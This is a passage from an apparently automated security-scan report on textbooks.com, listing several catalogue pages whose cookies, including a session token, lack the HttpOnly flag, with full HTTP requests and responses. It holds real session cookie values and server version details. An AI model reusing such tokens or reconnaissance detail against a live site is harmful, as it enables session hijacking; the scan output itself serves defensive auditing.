JMgUJdgIXK9tW3WK6u5anDGcM21gakIejWSQX0ziA8yOuynqIz5zNX4eZcZ%2FAVB3qJomp23e5A8Bq9W1GhI4EPhI3P92ddZL7zzWteX5IDod8B1KeMXNBbl8b4mhv7USPcWWdEiN7ZS9GeuomkLCMhlL0t0dS%2FQoJZAcOihkYy8Bh0Nb94Ar6S0hqAJMe4dmtIdqUITjELDtLPcmlnT%2BAQ04mgLrjehopCBnaiiJh1du7AHiopQapjoXiBm2N47DxuhFiZoagJcXo8P%2BtzRC8sCJjE1cXBPdnaAaxmkoOuuIqWLVV5w6dmg0GPNXOZM9F0X0vnhLmmom343SLzQyKw2QZUQt0mXnbfYPnQFpVNp%2BLxYCo%2FcE5oeGmLUkcpb%2B0Q2KBD5UMGw%2Bjb6ZYk0aojaqDdriVkm2IFGMy1Oy0gRoshgDlx2C%2BWtaKoQStdj4FFACl2chT6cW0ouSCrUX5PBzyp9cF9csPIOqFYV3vvXKHHkkjkAPHQ66Te0TdZi6FQy1j17BXSBQWewkrg9jE9yJtidLhlgOuW0RXxm0vxtxyk5MuiBkZ23izbuw7yqvEbGfnmCfVWKeYcNlE3m7jbAJH420GPadN%2FNAKWG05sDaKuyNbdl7uGyqOJO7ewKXblbDdrq%2BuxmgEj3E%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=KMxvh%2F01XScLHyvOudc%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/A/Agriculture-and-Animal-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IyVuCqYuAWRptohxdfBhEwi0m%2ByBINgd5n6P0FIbcFqpmFLzV1mhy69WGBLhGH%2BRENyUVFCGInw8HUIU%2Bg6OUg9hFzrlYo5Ammn1QoPOILU4kXdaracKHVPT%2BOYr9m8C2B6R6%2FaQpqtkkdxkqR%2BRRU1G02%2BCZE0ZG5hSK9jsRP%2FsnDBjxsu%2BEhDjZzUjdSVwbHDxjHoevpr6GIUVRo163cSyh6jISraIqhEni5kZMH1iX2dujVQfo5VHnyQoSHbpspzTsHqouDJhpr3dlNJB1GcwDlfyR4Jm4cWvzinzcPwnAQ5Tj8w6HY7dJOacd%2F9qhZuo27w3FDBOZDEeuilokoiSW1YRYGr1EXuNON%2BGcUXLGQwYJ%2BqvFrFQAVI%2F2fWEgN58JlrncGg6Lsty%2BuoSxFPiVE05XwurJJ%2BEaX5zfXcbvFJrJglFGYDd5VmMTdqZJsf%2BcaGfP72PjXsIjPv0kLLQBLpT%2B%2BZ%2Bryn9DzDahPy%2FrrMy91jFH5Ig4Sv7mF%2FmoxYrK6UkRz3yQMcAVStWgfp1ULZ92IDOZYwXaNqn5hRgxCYQRfRpyx9Sw6%2Bp1K%2FBISiRto15j5ewiXjKtCKFbgeRCXksJ3rq7w3%2B2%2Bug2tAyWuZkbxdZ8kh4SsHHv1pfieN%2BtkTG0kd19Qg2S2%2F%2BpQm%2BSauQ0KCRThiA6hzkd%2FMl7%2FNxK6pWI6kVjuun96kA6gcfTE7aw1xxY48ZOsxWfSffkqXL9ohW%2B%2B8CB%2F%2FBYup3v1fwHsF54WRA0V7wxRr7rrwl8JQ%2FR0dG17xDyn%2FI4VWEXCroQYsQqV%2BXkFdpCGYOONkbdJTCXpzh5Pr0%2BDQ3MOmKG7uR%2BEmpDjO6mP1%2Bp7keOPZFGYjDb1ACSBvYBbWUYmvI6fhOIZJAZCx49nVBiKS9JG5H4FRZPFw9iwh5%2FABth0gvtxBeU52MdVkNc2x%2B%2BjpWxxwHsI3pdabQM79nqHP0VZn36dNnyCWF10rkOpKnzdwBKwAcuMMqtywxHUejZeF2BQ%2BCfS9gJKL7VSkwEEpNko2I6qIdKCi5oSbUDcOr26DJ7INnKnuTqbR%2B5xOA0cRFdiV7QjxacrFzAILYLRww7vI7ljvxXqGfUmV6ZJk8Bu1ZqbHBB%2BoQFNdluxujPmVG6AClGRGImYFqDom7TovsCaSlGu%2BBlqxtsgGv5wNOUD23TwizdTImIrrgTYMAPvIp%2F62v%2BgVUpd2RVqgqDqOUZHZdeLhOpTHZ%2Bo8NW7nDo3cuReUYCCRnU1x0zJiKQUVP%2FqTIeVQ6aek%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=5lanJ%2BfFuYAsp73%2FIYk%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 132548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/B/Business-and-Economics.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=yLw4NO06c6Ga7KUhlK5wiP992BOqjFKWOhemXEGhBc6V5AGLwU8DWmOwL2UoJzpcQNxL%2F5haD9piZhrh2Q1uaWUTwfZn93cBIL4bgpGL3t%2B%2FvFzFkMPADykRoFsjYiz7EgOqlMOUTgHREi2i7SwIWdU7Em6XFwzgeQlJ8Ys8M3AiesvsRvufPDd4EWa1lHTTRJ9NbRq2lJ5wMP0GIrLyJc0mnDfPRYY%2Fe1RDdHvzuoIXOXUhisbL2H7RvO7st4N1Cxs%2BGOPAwso4h9e28UUnqRADqKNKw%2FBqQKlVtPkBRfltVsXOaDHWE5LMK7S8y5bR6cRhuCb8aBb5kAX3tLNw4O3wNKgM2aPkr%2FD52c13ZdKXwf0s4hpRQlLzdLrT53vaaZ%2F3I4cuWw9X9hn6xwWxrKLS%2F2Elk28ccN6mZ1RTAGMczm2ArnzVfmfZUKGYYGsYVF00i1bnzMtzZQ8TEW0iZju4PT4qx%2BL37rqgOhFNT3g7OrXtVDDWQBLY4prxY10sRwKWpP7Uo9TMspLZTAZLS9Nbg7AtlVq5hFEHqwhEKbwN00o%2FvB%2FnfDrCLv2NaZIw3KfAiA%2FwsFe8Y4EHiSlp46tiZiG2O7r271jW95pqfqm5jkBhWpv2DFCowX%2BZ5uwsWtM2HdGDt0nhNMLsqzoSAkNBg01jRa%2FCM7lfvqAzsU62F2UdeQZkAYEONskjmPviQK9oRRvsBRvuZTET0dj2iuumIMnuZk0fKZDCU5AwPUyGnIyeHwOtj9mEL53hUUS47nbP0FwmxRshcQG5N6kV%2B7WSibTCG1gRKaWIAwgfMBiPx%2FhbnbA%2B0i%2B6M%2FbQimIf1oLeVvNvMATITrwxNhLr1zZLvDoAFrB83lJzm%2BR5xCx2w8V0PTZQKCsF%2F9VzZmCBCPmh35EWoiE5WBEgSWCIdw6oqwb24yEPnuwGC7YBUeXy83gW1NlGTcv6X8NrKQJPB8aeLwKghDVnjpJme1%2FmxDZAZHtZn8PeCJ39LCPqRMI4lxwhJHxpEuV%2BLpHNlbv%2BjWk%2FROHyImna5RNnYFWgkKAd9U%2F3zuqN0p5%2B5mhePHCZcsmd5rU1fs%2BADbu0wuiiR7AMNit3NSZNW5V46XGCHVnVKDUwhgchZ%2FAYr1U%2BR37uOI3nO8vqMlWcqmD7c%2F2MIYmmezSAGvCRI6tj7swTXEioQMDEQuZ6ndNCFPuKtaRL0gNyqSUfDnVTxkbOulYihWyRjAaIDNt85QZwkoaT5PGiGabeP%2FSoKFfxKp%2FxdUf5VaQmEF4UjE0%2FJ%2Fk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=Po61YNkCwF%2Borj5Wwmo%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 100118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/C/Communication-and-Media.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GflvJakRFJaZHar64sgfpixyIJizFExoPvfubgEHX74mYNU9eYfkv2DS85usjXepowH7reKOL%2BzuU3joe9lQtqX5NQlUHVGyTiem7A03mPnPgmg3KMEU6EzBsoaym9p2wfAUdQtkAY%2BhrpqX5Oxliu9VLNMVseOUaRftoQ%2FSlTCuRYK5hNVeDGGW9nd0pgUPotohkcrUveC085TRLxGNs8FcPElxfraVMuyracMhCpfrxeYg7KSDOzjBOMT%2BIQlW%2FwYIo8o3zGO2CNXIp4JQFijjBjEYTe0CbgfPZomv6QWWdNgdJf%2BxPuLFPH5mdkOE5mEdaZ%2FBSctcu21fqkZPBLkAd6tpM4fR5B9pKhsJM24yxnXvtMHlIJwxObKX912Wx8xcgOn6VmtRdrZUYDyKuENQQDyqwjXIa9D3JVdhUn%2BzflRaRo8s0ZP359TMfNN9k7oPCiS74%2B72KcLoW59DsNpQ3E0ATOUbp32lHoFOUq5LnNgJZbuQ3b8SZFymlG84sgEmaaqG1iMncLSqLlDxJB717qYuTWhD%2BVDgpY9gaK2NLogL4SI8%2FbJQDRVFjytQGdliajuLFgZLG5%2ByeXRRVaq6Db7w%2B6i4EgdIpIFZBs5BDNPLMTpHNwU3Cs8lhxE0vhX6YWX56fFr7mnBBmcbjhLgkHsJbsgJ5keVXHcIl0ELQK08WDby19mFIQjqaSVeb11QKD8ow27Bl1%2B1wH6O%2FOSlWDknFM4OfqtKpdUNq6kAyT%2Bld%2FTcyCWHrTpZNct6knZUXJh7Yk8S9bW3saCm0nJw%2Bh6D9mYO8UEtEzLM9VBmZmpVLZb7RIzez9kOlae9Hs%2B4PRlybJf8qtmqgfVzEjvt2z3sjH6bMoTiBlI0YoH5N6u7eux927Er64xNz2Od23ubQbsIWoh6kSPyhm104Vl06jjvMnsZo3%2BheDsiKiPKGx1Q7fmf98TH%2FVKzM%2BM6KOMbeRswvPk5KYoxjtZ2le%2FPw%2BVXot6ByHfv%2FDwy5m5lf6h5WLD%2BHIiXaTS6mr30ISUba34baGYm0EXzmo%2Bxpy73LARAWIIM8rLdxX%2BOlvvRYYjayWKApEY9kRkNSQFGtCnTTPZ%2Bz1kdD9o0gvjv8y0SWCSTN2bBl7F30PmpNGu5vgPi7vcMsAoISW2OiA2Iuog4j5Rxzm7Yjhg5GXlAzI%2BSXK9WI6clxDFUD1RkSWm2D0CZKO83%2BWP5BJ8zoMPMM2fdMJOIzdYEWPoJEgD1nO%2BOrZrqKIbbRGvFZY%2F7LF0z6uZyz%2BSLGgYtqi0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=ypV4xbizAJKCvg8uCNg%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 122719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/D/Computer-Science-and-Technology.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=RtCUsbWXaFR47MNWPWHOzPcmR78poiHZjG7hDxh7QODVdNiT0%2FgnZ98hCqLh7wT9sDekHYtZF%2BwOIfrndsIMeQSDgDPcWbJF9puHQxEa6%2BitYnwan4YS%2FvP7UzwbH%2B2tMpGeGyOmWGv6%2BEOj8vihwI2MrJKUAULzP03b2fAeY7mTFQRQO1meIcgqIwr4x81VQwUR6Peqv6A%2FmYHiBf4HV3PFOZB%2BBiEKNLSRYdiRikFZB0Qjz58nLotkTytGq5lMmcHSx2D9n%2BlTV4Yi%2BQVQzsxLPIGEPrf7AdYh%2BDzuqpLg%2BnpWAXkJVSoQ0tnhvMmqVdnc8O0J%2BMEjDIyUriloigVUhNoty2m7L8tZMQykQRMxxifyi7VH4vM%2FEN4QUSvZpizcCfGKZQQRQwdyTQ19QVxz1p%2BV7U4%2FFn18CiISYeoJYlkJ93KaU88UkUEdKfVMVsf8jSpalZsEqCnX8MjAInoflORDE2NfnghY%2BMVz0tyRmaYXXo6CzRW20AnegvjjrXYCZfpFx2OJPzn4ct7MyUCh3gPOi2wdOcGjkG3OboZdX28ux7lIg0dTOu%2BAI3B28DUHw11eZ1cWfPelg3dHyaoetrpvnMbPI7gADHXiX909SEJY3oR0%2FQi6NZN9uaE51a5Ejjl5NZnfGZLEl7JeO7NTV%2F24Pqd%2BGbBjI8okC9xle6OnRbj0nolHzBgnJIvcj8m2TWNU9h87d6M%2FGdKDYi2i0KCpw9%2BBioCIasHoqfhJAzaUgZ2r8Uj2PIEMtGWNs5nZkPlHMvOxd0ObSZTJLyMW0M8IHUVoYLq%2FYWFeUP9VBnR0uTlqS5Feil%2B%2F2gieTTgQHSaCwK8IAWSTWr8uF5wGxJM%2FI3zruPwXAGf3Lkghr3ZwHI6Mlk%2BrQ4wMTicYC%2FYpFYaEztQf5bkaDbb0Xb5voEGInwWxmyt10dmD33Ngdapiq6h0VqcltGHBsCHOI9XgQ1DCBBqoOC64FfPQWBwheQkuY104mXfwXjwBh7Z75ifIj%2F9Dexa9lxyQDa6A%2BnrkNUhIFg1btmhOVziLgsDmmQOfPtYffSDnBpvGQGQBAmW2RgNKLkXXoJcVPburDXBmkxZNRHmwLKqH5k8DWhbfwgv6gDdOOBebqdbfwkGL02KMNXS8TDFMF6bzCnMfCqHaVeMlABDRdfCUzfeEMT8N%2BIHq77PK7fTKrHzsBx1JnjId9FT3NOmVy3UC%2FQfHBZvFFPmpiBP6VvfUDXLDuD%2BTWMXwseiTH4DuYDXrcgD15pGocCqojnb%2F0z4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=qg3kYe9q6PN%2FD6c8q%2FY%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 126483


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

